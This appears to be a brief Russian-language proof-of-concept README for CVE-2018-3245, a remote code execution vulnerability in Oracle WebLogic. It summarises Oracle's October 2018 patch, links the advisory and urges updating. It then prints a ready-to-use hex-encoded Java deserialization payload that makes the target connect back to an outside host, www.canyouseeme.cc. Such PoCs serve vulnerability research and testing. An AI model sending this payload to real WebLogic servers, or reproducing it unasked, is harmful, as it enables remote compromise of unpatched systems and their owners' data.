
CVE-2018-3245
CVE-2018-3245
16 октября по местному времени, ранним утром 17 октября по пекинскому времени, Oracle официально выпустила критическое обновление патча (CPU) за октябрь (третий квартал), в котором была исправлена уязвимость удаленного выполнения кода WebLogic (CVE-2018-2893), не полностью устранённая в патче CPU за июль (второй квартал). Новая исправленная уязвимость имеет идентификатор CVE-2018-3245.
Oracle уже исправила эту уязвимость в текущем критическом обновлении патча (CPU). Настоятельно рекомендуется пострадавшим пользователям как можно скорее установить обновление для защиты.
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html


jas502n-poc.txt
Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e69636173746552656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078
